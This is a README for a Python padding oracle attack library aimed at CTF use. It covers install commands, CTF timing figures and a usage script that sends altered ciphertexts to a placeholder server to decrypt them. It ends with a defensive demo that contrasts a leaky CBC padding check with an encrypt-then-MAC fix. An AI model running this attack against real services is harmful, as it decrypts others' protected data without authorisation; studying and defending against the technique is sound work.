padding-oracle

Threaded padding oracle automation.


Keywords: cipher, crypto, cryptography, ctf, ctf-tools, hacking, hacking-tool, padding-oracle, padding-oracle-attacks, web-security
License: MIT
Install: pip install padding-oracle==0.1.6

Documentation

padding_oracle.py

Extremely fast threaded padding oracle automation script for Python 3.

Install

Installing from PyPI:

pip3 install -U padding_oracle

Or, installing from GitHub:

pip3 install -U git+https://github.com/djosix/padding_oracle.py.git

Performance

Tested on [0x09] Cathub Party from EDU-CTF:

Request Threads   Execution Time
1                 17m 43s
4                 5m 23s
16                1m 20s
64                56s

Example

All you need to do is define an oracle function that checks whether the given cipher is decrypted correctly.

from padding_oracle import *

import requests

# Create a requests.Session to enable connection pooling
sess = requests.Session()

# Define a function to test if the cipher can be decrypted
def oracle(cipher):
    resp = sess.post('http://some-website.com/decrypt',
                     data={'cipher': base64_encode(cipher)}).text
    assert 'Good' in resp or 'Bad' in resp, 'Exception?'
    return 'Good' in resp


cipher = b'[______IV______][____Block1____][____Block2____]'


# DECRYPT THE CIPHER!!!
plaintext = padding_oracle(cipher,
                           block_size=16,
                           oracle=oracle,
                           num_threads=64)
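
What the oracle callback above observes on the server side, and how encrypt-then-MAC removes that signal, shown as an added local example that is not part of the padding_oracle project. The toy Feistel cipher stands in for AES so the block runs on the standard library alone; the keys and all names (`leaky_oracle`, `hardened_oracle`, `seal`, `answers`) are assumptions constructed for this demo.

```python
import hashlib, hmac, os

BLOCK = 16
ENC_KEY, MAC_KEY = os.urandom(16), os.urandom(32)  # constructed demo keys

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _feistel(block, rounds):
    # Toy 4-round Feistel block cipher standing in for AES (assumption, not secure).
    l, r = block[:8], block[8:]
    for n in rounds:
        l, r = r, _xor(l, hashlib.sha256(ENC_KEY + bytes([n]) + r).digest()[:8])
    return r + l  # final swap: running the rounds in reverse order inverts the cipher

def cbc_encrypt(msg):
    pad = BLOCK - len(msg) % BLOCK
    msg += bytes([pad]) * pad  # PKCS#7 padding
    out = [os.urandom(BLOCK)]  # random IV is the first block
    for i in range(0, len(msg), BLOCK):
        out.append(_feistel(_xor(msg[i:i + BLOCK], out[-1]), range(4)))
    return b''.join(out)

def cbc_decrypt(data):
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    pt = b''.join(_xor(_feistel(c, range(3, -1, -1)), p) for p, c in zip(blocks, blocks[1:]))
    n = pt[-1] if pt else 0
    if not 1 <= n <= BLOCK or pt[-n:] != bytes([n]) * n:
        raise ValueError('bad padding')
    return pt[:-n]

def leaky_oracle(cipher):
    try:
        return cbc_decrypt(cipher) is not None  # True whenever padding was valid
    except ValueError:
        return False  # vulnerable pattern: the caller can tell padding was invalid

def seal(msg):
    ct = cbc_encrypt(msg)  # encrypt-then-MAC over IV || ciphertext
    return ct + hmac.new(MAC_KEY, ct, hashlib.sha256).digest()

def hardened_oracle(token):
    # Constant-time tag check first; modified input never reaches the padding check.
    ct, tag = token[:-32], token[-32:]
    ok = hmac.compare_digest(tag, hmac.new(MAC_KEY, ct, hashlib.sha256).digest())
    return ok and leaky_oracle(ct)

def answers(oracle, data, pos):
    # Distinct answers seen when one byte is set to every value except its original.
    return {oracle(data[:pos] + bytes([v]) + data[pos + 1:]) for v in range(256) if v != data[pos]}
```

With `leaky_oracle`, changing a single ciphertext byte produces both answers, which is the distinguishable signal the tool depends on; with `hardened_oracle`, every modified token gets the same rejection.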